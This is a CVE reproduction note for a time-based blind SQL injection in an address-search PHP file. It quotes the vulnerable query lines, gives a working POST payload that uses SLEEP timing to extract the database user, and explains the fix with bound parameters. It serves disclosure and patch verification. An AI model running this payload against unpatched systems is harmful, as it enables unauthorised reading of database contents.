CVE-2026-26990 Reproduction Evidence
=====================================

VULNERABILITY: Time-Based Blind SQL Injection
FILE: includes/html/table/address-search.inc.php
AFFECTED VERSIONS: < 26.2.0
FIXED VERSION: 26.2.0

VULNERABLE CODE:
----------------
Line 34: $sql .= " AND ipv4_prefixlen='$prefix'";
Line 52: $sql .= " AND ipv6_prefixlen = '$prefix'";

The $prefix variable is extracted from user input via the 'address' parameter
by splitting on the '/' character. The prefix value is then directly 
concatenated into the SQL query without sanitization or parameter binding.

EXPLOITATION:
-------------
POST /ajax_table.php
Parameters:
  - id=address-search
  - search_type=ipv4
  - address=127.0.0.1/aa' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING((SELECT CURRENT_USER()),1,1))=[CHAR],SLEEP(1.5),0))x) AND '1'='1

The injection point is after the '/' in the address parameter.
Time-based blind SQL extraction is possible by measuring response times.

FIX:
----
The fix replaced the procedural code with Laravel controllers using 
Eloquent ORM with proper parameter binding:

if (isset($cidr)) {
    $q->where($this->cidrField, $cidr);
}

This uses prepared statements with bound parameters.